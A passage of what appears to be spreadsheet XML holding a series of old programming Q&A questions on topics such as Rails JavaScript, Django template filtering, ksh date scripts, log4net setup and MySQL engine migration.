&lt;li&gt;&lt;p&gt;Rails typically uses inline event handling.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a onclick="somejavascript(); return false;" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is generally frowned upon, as it's mixing behavior in with the XHTML. &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The generated JavaScript also relies heavily on Prototype. Personally, I prefer jQuery.  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;In my experience, the attitude with a lot of Rails developers has been to write as much of the code in Ruby as possible. The final step being to generate some very procedural and repetitive JavaScript. Often, this code ends up being very inflexible and difficult to debug.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So, my question is: how much JavaScript do you write manually for your projects and how much of it is generated server side with Rails/Ruby? Or is there a happy medium where you get the benefits of both? With a subquestion: if you write a lot of the JavaScript manually, what techniques do you use to fit it into the MVC model?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Inline Disabling of Firefox Spellcheck?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I researched this a while ago and can't remember how to do it. I want to be able to prevent Firefox from running it's spell-checking functionality on certain input fields from within the page. I know it's possible but can't remember how to set it up.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I perform query filtering in django templates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to perform a filtered query from within a django template, to get a set of objects equivalent to python code within a view:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;queryset = Modelclass.objects.filter(somekey=foo)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my template I would like to do&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{% for object in data.somekey_set.FILTER %}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but I just can't seem to find out how to write FILTER.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I calculate the previous business day in ksh shell script?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the most elegant way to calculate the previous business day in shell ksh script ?&lt;/p&gt;
&lt;p&gt;What I got until now is :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/bin/ksh
set -x
DAY_DIFF=1
case `date '+%a'` in
"Sun")
   DAY_DIFF=2
   ;;
"Mon")
   DAY_DIFF=3
   ;;
esac
PREV_DT=`perl -e '($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst)=localtime(time()-${DAY_DIFF}*24*60*60);printf "%4d%02d%02d",$year+1900,$mon+1,$mday;'`
echo $PREV_DT
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I make the ${DAY_DIFF} variable to be transmitted as value and not as  string ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>local variables in constructors are not followed. Is this a bug in gdb ?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently running gdb version 6.7.1 on Ubuntu Linux, and working in a C++ project.&lt;/p&gt;
&lt;p&gt;Surprisingly I was trying to debug a constructor and I have found that local variables declared within the scope of the constructor are not followed or noticed by gdb. Is this a bug ?&lt;/p&gt;
&lt;p&gt;Thanks for any information ..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>QuickBooks Item Query help needed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm sure this is going to be a long shot, but I need help with a query involving QuickBooks Items.&lt;/p&gt;
&lt;p&gt;I need to query for all QuickBooks Items that are linked to an Income account. Is there an easy way to do this, or do I need to make 2 queries (one for items ans one for accounts) and then check the account reference?&lt;/p&gt;
&lt;p&gt;albeit not much, I have this:&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
IItemQuery query = MsgSetRequest.AppendItemQueryRq();
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;any ideas would be appreciated. Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL: How do I SELECT only the rows with a unique value on certain column?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Thanks a million everyone for everyone's response.  Unfortunately, none of the solutions appear to be working on my end, and my guess is that the example I've provided is messed up.&lt;/p&gt;
&lt;p&gt;So let me try again.&lt;/p&gt;
&lt;p&gt;My table looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;	contract	project	activity
row1	1000	8000	10
row2	1000	8000	20
row3	1000	8001	10
row4	2000	9000	49
row5	2000	9001	49
row6	3000	9000	79
row7	3000	9000	78
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Basically, the query I'm looking for would return "2000,49" for "contract, activity" because only contract #2000 has one, and ONLY one, unique activity value.&lt;/p&gt;
&lt;p&gt;Again, thanks a million in advance,
boroatel&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between iPod touch and iPod touch 2nd generation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When submitting an app to the app store what is the real difference between iPod Touch and iPod Touch 2nd generation?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>log4net with ASP.NET 3.5 problems</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having some trouble getting log4net to work from ASP.NET 3.5. This is the first time I've tried to use log4net, I feel like I'm missing a piece of the puzzle.&lt;/p&gt;
&lt;p&gt;My project references the log4net assembly, and as far as I can tell, it is being deployed successfully on my server.&lt;/p&gt;
&lt;p&gt;My web.config contains the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;configSections&amp;gt;
    &amp;lt;section name="log4net"
      type="log4net.Config.Log4NetConfigurationSectionHandler
      , log4net"
      requirePermission="false"/&amp;gt;
  &amp;lt;/configSections&amp;gt;
  &amp;lt;log4net&amp;gt;
    &amp;lt;appender name="InfoAppender" type="log4net.Appender.FileAppender"&amp;gt;
      &amp;lt;file value="..\..\logs\\InfoLog.html" /&amp;gt;
      &amp;lt;appendToFile value="true" /&amp;gt;
      &amp;lt;layout type="log4net.Layout.PatternLayout"&amp;gt;
        &amp;lt;conversionPattern
          value="%d [%t] %-5p %c [%x] - %m%n" /&amp;gt;
      &amp;lt;/layout&amp;gt;
    &amp;lt;/appender&amp;gt;
    &amp;lt;logger name="_Default"&amp;gt;
      &amp;lt;level value="INFO" /&amp;gt;
      &amp;lt;appender-ref ref="InfoAppender" /&amp;gt;
    &amp;lt;/logger&amp;gt;
  &amp;lt;/log4net&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm using the following code to test the logger:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using log4net;
using log4net.Config;
public partial class _Default : System.Web.UI.Page
{
    private static readonly ILog log = LogManager.GetLogger("_Default");
    protected void Page_Load(object sender, EventArgs e)
    {
        log.Info("Hello logging world!");
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my Global.asax, I'm doing the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void Application_Start(object sender, EventArgs e) 
{
    log4net.Config.XmlConfigurator.Configure();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At this point, I can't think of what else I might be doing wrong. The directory I'm trying to store the log in is writable, and even if I try different directories I get the same result: no file, no logs.&lt;/p&gt;
&lt;p&gt;Any suggestions? :-)&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Edit: I've tried several different formats for the path &amp;amp; name of the log file, some of which include "..\..\InfoLog.html", "InfoLog.html", "logs\InfoLog.html", etc, just in case someone is wondering if that's the problem.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Edit: I've added the root logger node back into the log4net section, I ommitted that on accident when copying from the samples. The root logger node looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;root&amp;gt;
  &amp;lt;level value="INFO" /&amp;gt;
  &amp;lt;appender-ref ref="InfoAppender" /&amp;gt;
&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Even with it, however, I'm still having no luck.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>xcopy ASP.NET deployment of a Subversion-managed project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently using Subversion to manage my ASP.NET website. I'm finding that whenever I go to upload my website to my server, I'm copying a large number of hidden .svn folders and whatever contents may lie within them.&lt;/p&gt;
&lt;p&gt;Does anyone have any suggestions for avoiding this? I don't particularly want those hidden .svn folders on the production server, but short of manually deleting each .svn folder before I upload my website, I'm at a loss for how to have a .svn-folder-free production environment.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Edit: Thank you everyone, those are great suggestions, I really appreciate it!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to see the CODE for sp_executesql? Is it TSQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to see the CODE for sp_executesql? 
I would like to see the actual code. 
I could not find it in sql server management studio. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Checkout from TFS with MSBuild</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the easiest way to checkout a file from our TFS with MSBUILD. &lt;/p&gt;
&lt;p&gt;From what I can see it's to shell out to TF.EXE and manually call the checkout command. Is there really no built in command?!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does "Edit and continue" work in Visual Studio?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have always found this to be a very useful feature in Visual Studio.  For those who don't know about it, it allows you to edit code while you are debugging a running process, re-compile the code &lt;em&gt;while the binary is still running&lt;/em&gt; and continue using the application seamlessly with the new code, without the need to restart it.&lt;/p&gt;
&lt;p&gt;How is this feature implemented?  If the code I am modifying is in a DLL loaded by the application, does the application simply unload the DLL and reload it again?  This would seem to me like it would be prone to instability issues, so I assume it would be smarter than this.  Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to remove the background from a fingerprint image?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a fingerprint image taken from a sliding scanner. However the output does not have clean background. It looks like this:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img208.imageshack.us/img208/2622/dirtyie0.png" alt="dirty" /&gt;&lt;/p&gt;
&lt;p&gt;I want to remove the background so that further processing will be more accurate. Something like this:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img515.imageshack.us/img515/7530/cleanhh6.png" alt="cleaned" /&gt;&lt;/p&gt;
&lt;p&gt;How to do that? What image processing technique (if any) can be used? Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Incoming poplib refactoring using windows python 2.3</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys could you please help me refactor this so that it is sensibly pythonic.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import sys
import poplib
import string
import StringIO, rfc822
import datetime
import logging
def _dump_pop_emails(self):
    self.logger.info("open pop account %s with username: %s" % (self.account[0], self.account[1]))
    self.popinstance = poplib.POP3(self.account[0])
    self.logger.info(self.popinstance.getwelcome()) 
    self.popinstance.user(self.account[1])
    self.popinstance.pass_(self.account[2])
    try:
        (numMsgs, totalSize) = self.popinstance.stat()
        for thisNum in range(1, numMsgs+1):
            (server_msg, body, octets) = self.popinstance.retr(thisNum)
            text = string.join(body, '\n')
            mesg = StringIO.StringIO(text)                               
            msg = rfc822.Message(mesg)
            name, email = msg.getaddr("From")
            emailpath = str(self._emailpath + self._inboxfolder + "\\" + email + "_" + msg.getheader("Subject") + ".eml")
            emailpath = self._replace_whitespace(emailpath)
            file = open(emailpath,"wb")
            file.write(text)
            file.close()
            self.popinstance.dele(thisNum)
    finally:
        self.logger.info(self.popinstance.quit())
def _replace_whitespace(self,name):
    name = str(name)
    return name.replace(" ", "_")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also in the _replace_whitespace method I would like to have some kind of cleaning routine which takes out all illegal characters which could cause processing.&lt;/p&gt;
&lt;p&gt;Basically I want to write the email to the inbox directory in a standard way.&lt;/p&gt;
&lt;p&gt;Am i doing something wrong here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tips for writing fluent interfaces in C# 3</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm after some good tips for fluent interfaces in C#. I'm just learning about it myself but keen to hear what others think outside of the articles I am reading. In particular I'm after:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;when is fluent too much?&lt;/li&gt;
&lt;li&gt;are there any fluent patterns?&lt;/li&gt;
&lt;li&gt;what is in C# that makes fluent interfaces more fluent (e.g. extension methods)&lt;/li&gt;
&lt;li&gt;is a complex fluent interface still a fluent one?&lt;/li&gt;
&lt;li&gt;refactoring to arrive at a fluent interface or refactoring an existing fluent interface&lt;/li&gt;
&lt;li&gt;any good examples out there that you have worked with or could recommend?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If you could post one tip or thought, or whatever per post. I want to see how they get voted on, too.&lt;/p&gt;
&lt;p&gt;Thank you in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I pass arguments to anonymous functions in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to figure out how to pass arguments to an anonymous function in JavaScript.&lt;/p&gt;
&lt;p&gt;Check out this sample code and I think you will see what I mean:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input type="button" value="Click me" id="myButton" /&amp;gt;
&amp;lt;script type="text/javascript"&amp;gt;
    var myButton = document.getElementById("myButton");
    var myMessage = "it's working";
    myButton.onclick = function(myMessage) { alert(myMessage); };
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When clicking the button the message: &lt;code&gt;it's working&lt;/code&gt; should appear.  However the &lt;code&gt;myMessage&lt;/code&gt; variable inside the anonymous function is null.&lt;/p&gt;
&lt;p&gt;jQuery uses a lot of anonymous functions, what is the best way to pass that argument?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I set a SQL Server script's timeout from within the script?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a large script file (nearly 300MB, and feasibly bigger in the future) that I am trying to run.  It has been suggested in the comments of Gulzar's answer to my &lt;a href="http://stackoverflow.com/questions/222442/sql-server-running-large-script-files"&gt;question about it&lt;/a&gt; that I should change the script timeout to 0 (no timeout).&lt;/p&gt;
&lt;p&gt;What is the best way to set this timeout from within the script?  At the moment I have all of this at the top of the script file in the hopes that one of them does something:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sp_configure 'remote login timeout', 600
go
sp_configure 'remote query timeout', 0
go
sp_configure 'query wait', 0
go
reconfigure with override
go
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I'm still getting the same result and I can't tell if I'm succeeding in setting the timeout because the response from sqlcmd.exe is the world's least helpful error message:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Sqlcmd: Error: Scripting error.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should the timezone be a constant or a variable?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a few places in the code where I need to use the TimeZone. I can get the timezone name using &lt;a href="http://search.cpan.org/dist/DateTime" rel="nofollow"&gt;DateTime::TimeZone&lt;/a&gt;. Is it reasonable to put the timezone name in a constant? Or should it be in a variable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to stop IE asking which debugger to choose when **trying** to debug?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When debugging in Internet Explorer; I first get an alert box with extremely limited if not useless information (sorry IE) and choice to debug it; After selecting yes; I get another option &lt;em&gt;every time&lt;/em&gt; to chose between 'New instance of Microsoft script debugger' and 'New instance of Visual studio'. I'm fed up of having to click the yes button again after having clicking it once already on the alert box.&lt;/p&gt;
&lt;p&gt;Update: I found that you can disable the microsoft script debugger from within its own options; just disabling the JIT debugger from Tools -&gt; Options, and JIT. This stops it appearing on the menu but now I get the dialog box asking me which one to choose and it only displays the one Visual Studio - WHY? If there's only one option and you've already asked me if I want to debug, why ask again?!?! Bleh.&lt;/p&gt;
&lt;p&gt;can you tell I'm getting sick of clicking, "yes" twice? Lol.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Code Coverage on Visual Studio Team System 2008 Developer Edition (on an NUnit application)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is this possible? I am looking forward to a tutorial which explains the steps to achieve this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ejabberd - LDAP authentication</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to configure an ejabberd installation, using LDAP authentication, but I just can't login, even with the admin user.
This is part of my ejabberd.cfg file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;%...
{auth_method, ldap}.
{ldap_servers, ["server2000.tek2000.local"]}.
{ldap_port,389}.
{ldap_uidattr, "uid"}.
{ldap_base, "dc=server2000,dc=tek2000,dc=com"}.
{ldap_rootdn, "tempadm@tek2000.local"}.
{ldap_password, "secret"}.
%...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What am I missing?&lt;/p&gt;
&lt;p&gt;I must say that, with OpenFire, I can connect using this credentials/configuration.&lt;/p&gt;
&lt;p&gt;I'm using Spark as my client application.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Receive parameter from request body in WCF/ADO.NET Data Service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm tryint to post to a ADO.NET Data Service but the parameters seems to get lost along the way.&lt;/p&gt;
&lt;p&gt;I got something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[WebInvoke(Method="POST")]
public int MyMethod(int foo, string bar) {...}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I make an ajax-call using prototype.js as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var args = {foo: 4, bar: "'test'"};
new Ajax.Requst(baseurl + 'MyMethod',
  method: 'POST',
  parameters: args,
  onSuccess: jadda,
  onFailure: jidda
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I replace "method: 'POST'" with "method: 'GET'" and "WebInvoke(Method="POST")" with "WebGet" everything works but now (using post) all I get is:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Bad Request - Error in query syntax.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;from the service.&lt;/p&gt;
&lt;p&gt;The only fix (that I don't want to use) is to send all parameters in the URL even when I perform a post. Any ideas are welcome. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any pitfalls / things you need to know when changing from MyISAM to InnoDB</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One of my projects use the MyISAM engine in MySQL, but I'm considering changing it to InnoDB as I need transaction support here and there.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What should I look at or consider before doing this? &lt;/li&gt;
&lt;li&gt;Can I just change the engine, or should the data be prepared for it?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Removing Duplicate Images</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a collection of photo images sizing a few hundred gigs. A large number of the photos are visually duplicates, but with differing filesizes, resolution, compression etc. &lt;/p&gt;
&lt;p&gt;Is it possible to use any specific image processing methods to search out and remove these duplicate images?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to generate empty definitions given a header file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a 3rd-party library which for various reasons I don't wish to link against yet.  I don't want to butcher my code though to remove all reference to its API, so I'd like to generate a dummy implementation of it.&lt;/p&gt;
&lt;p&gt;Is there any tool I can use which spits out empty definitions of classes given their header files? It's fine to return nulls, false and 0 by default.  I don't want to do anything on-the-fly or anything clever - the mock object libraries I've looked at appear quite heavy-weight?  Ideally I want something to use like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ generate-definition my_header.h &amp;gt; dummy_implemtation.cpp
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm using Linux, GCC4.1&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to load a .NET assembly for reflection operations and subsequently unload it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a tool to report information about .NET applications deployed across environments and regions within my client's systems.&lt;/p&gt;
&lt;p&gt;I'd like to read the values of assembly attributes in these assemblies.&lt;/p&gt;
&lt;p&gt;This can be achieved using &lt;code&gt;Assembly.ReflectionOnlyLoad&lt;/code&gt;, however even this approach keeps the assembly loaded.  The issue here is that I cannot load two assemblies that have the same name from different paths, so naturally I can't compare the same application deployed in different systems.&lt;/p&gt;
&lt;p&gt;At this point I'm assuming the solution will involve using temporary &lt;code&gt;AppDomain&lt;/code&gt;s.&lt;/p&gt;
&lt;p&gt;Can someone detail how to load an assembly into another &lt;code&gt;AppDomain&lt;/code&gt;, read the attributes from it and then unload the &lt;code&gt;AppDomain&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;This needs to work for assemblies on the file system as well as those at URL addresses.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>On XP, best way to synchronize files and folders</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using SyncToy 1.4 and it would be fine for what I need except that: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It can't handle the assigned drive letter changing between systems (e.g. syncing a USB drive), &lt;/li&gt;
&lt;li&gt;it leaves its own (hidden) files in the folders being synched (is this a limitation of the OS/FS?), &lt;/li&gt;
&lt;li&gt;it recreates empty folders for ones that have been deleted, &lt;/li&gt;
&lt;li&gt;it syncs new sub folders in folders that have been unselected from syncing &lt;/li&gt;
&lt;li&gt;and sometimes finds all the files have changed when they are still the same as they were.&lt;/li&gt;
&lt;li&gt;it can't handle very long file path/name&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;SyncToy 2.1 is too slow to be usable. Especially when run again on a folder without any changes it will start from scratch scanning all the files and sub-folders for differences. &lt;/p&gt;
&lt;p&gt;It has to be a solution without using Internet based storage, as this isn't always available and otherwise can be far too slow. I'd prefer something that doesn't add its own files to the folders to be synched, and something with which it's quick and easy to change file and folder synching selections. When run the less interactive the better, ideally safely synching multiple folder pairs with a couple of mouse clicks (as SyncToy does).&lt;/p&gt;
&lt;p&gt;Do I have to use rsync and batch files? Something with a GUI for granny to use without difficulty, would be better.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a tool that supports discrete mathematics?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Discrete_mathematics" rel="nofollow"&gt;Discrete mathematics (also finite mathematics)&lt;/a&gt; deals with topics such as logic, set theory, information theory, partially ordered sets, proofs, relations, and a number of other topics.&lt;/p&gt;
&lt;p&gt;For other branches of mathematics, there are tools that support programming. For statistics, there is &lt;a href="http://en.wikipedia.org/wiki/R_(programming_language)" rel="nofollow"&gt;R&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/S_programming_language" rel="nofollow"&gt;S&lt;/a&gt; that have many useful statistics functions built in. For numerical analysis, &lt;a href="http://en.wikipedia.org/wiki/GNU_Octave" rel="nofollow"&gt;Octave&lt;/a&gt; can be used as a language or integrated into C++. &lt;/p&gt;
&lt;p&gt;I don't know of any languages or packages that deal specifically with discrete mathematics (although just about every language can be used to implement algorithms used in discrete mathematics, there should be libraries or environments out there designed specifically for these applications).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Performance : web application without precompilation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Currently we're using Web Application project, so we have a gain with compilation. But as far as I know, the aspx pages a still compiled at the first page hit. So does precompilation give a perceptible performance gain ? (first hit exluded).&lt;/p&gt;
&lt;p&gt;What type of web site (hits/sec, number of users) will benefit of it ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Embed image in code, without using resource section or external images</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a way to embed an image in a library (Windows-only). I don't want to go the 'traditional' way of putting it in the resources (because of special circumstances that make it not so convenient to mess around with the resource handle.&lt;/p&gt;
&lt;p&gt;Ideally, there would be something like xpm files: a 'text' representation of an image that is put in a c array and that some code converts into a bitmap in memory, which can then somehow be loaded into an HIMAGE or an HICON. The images I want to embed are 32-bit bitmaps (bmp). Any ideas? I'm using MFC so an MFC library would be fine, but of course I can use a library that doesn't use MFC too. Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to close a .Net Form from its PreFilterMessage()?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm filtering the messages that come to a form with PreFilterMessage like this:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;print("code sample");&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; public bool PreFilterMessage(ref Message m) 
 {
     if (m.Msg == WM_KEYDOWN &amp;amp;&amp;amp; (int)m.WParam == VK_ESCAPE)
     {
         this.Close();
         return true;
     }
     return false;
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;print("code sample");&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;but the matter is that form closes only for the first time. After reopening a form it won't close anymore by pressing ESC.&lt;/p&gt;
&lt;p&gt;How can I accomplish this?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a PHP function to remove any/all key/value pairs that have a certain value from an array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I think questions like this are the reason why I don't like working with PHP. The manual is good, if you can find what you are looking for. After reading through the &lt;a href="http://us3.php.net/array" rel="nofollow"&gt;Array Functions&lt;/a&gt;, I didn't see one that provides the functionality I need.&lt;/p&gt;
&lt;p&gt;I have an array (in my case, numerically indexed) that I want to scan for a particular value and, if it's there, remove it. And then, when all instances of that value have been removed, I want to rearrange the array using &lt;a href="http://us3.php.net/manual/en/function.array-values.php" rel="nofollow"&gt;array_values&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it good to include title="" within your links?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a website and for the main navigation, I was thinking it would be a good idea to include the title attribute.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a href="/results/" title="Results"&amp;gt;Results&amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this a good thing to do? Also, is it good for SEO and accessibility?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Controlling the execution of a Jython script from Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to control the execution of a Jython script from within Java and executed through a call to PythonInterpreter.exec(). The script contains calls to classes defined in Java. I'll call these classes "commands" for the discussion here. The commands can also be run on a different machine via RMI. &lt;/p&gt;
&lt;p&gt;Since the commands take a while to complete, I want to check the progress of the commands' execution on the caller side, like at what percentage of the execution is complete. I can provide a getProgress() method to the classes but accessing this method seems to be impossible to do because PythonInterpreter doesn't allow the caller access to the command object running inside it.&lt;/p&gt;
&lt;p&gt;Any ideas on how to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I include dependencies for my releases?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Should I include dependencies when I do releases for my common projects such as CommonUtils or should I simply specify which dependencies should be referenced when they are to be used?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to deal with multiple versions of dependencies?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi I have a problem with a dependency hierarchy I am unsure how to solve:&lt;/p&gt;
&lt;p&gt;
&lt;a href="http://img525.imageshack.us/my.php?image=56330713it2.jpg" rel="nofollow"&gt;http://img525.imageshack.us/my.php?image=56330713it2.jpg&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The problem is with how I should reference these dependencies from MyProject project. I have built BaseProject and the CommonUtil(version 1.0) it was built with into assemblies. Now in MyProject I am using classes from CommonUtil and I am unsure if I should reference the CommonUtil.v.1.0 or if I could/should reference the current version of CommonUtil (v 2.0).&lt;/p&gt;
&lt;p&gt;Which CommonUtils assembly should I reference from my MyProject?
I cannot reference both assemblies as VS tells me it cannot determine which assembly to use as they both contain some of the same methods. If I only reference v.1.0 I would perhaps not have everything I need from v.2.0 and If I only reference v.2.0 I would perhaps not have all capabilities in v.1.0 (which BaseProject) needs.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Syntax highlighting when pasting into emails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Im in the situation that I often send small codesnippets and xml-snippets to coworkers and partners via my outlook. 
Has anyone got a good idea or tool that I can use to have my pastes syntaxhighlighted before I paste them into an email.&lt;/p&gt;
&lt;p&gt;I was thinking of an intermediate paste to "$fancytool" and then I would have something to copy that will htmlified so I can copy paste it into the "compose email" window.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Edit-More-info:&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Im pasting from windows within a VMWare virtual Machine, it might be eclipse, xmlspy, logfiles and other programs&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Even-more-info:&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I've seen &lt;a href="http://vim.wikia.com/wiki/Pasting_code_with_syntax_coloring_in_emails"&gt;this link&lt;/a&gt; how to do it from Vim. Unfortunately it seldom from vim im copying Code, and my email machine hasnt got any vim. The vmware machines has gvim, but I was hoping for an easier way that pasting to vim, saving to file, opening in internetexplorer and then copy/paste&lt;/p&gt;
</t>
  </si>
  <si>
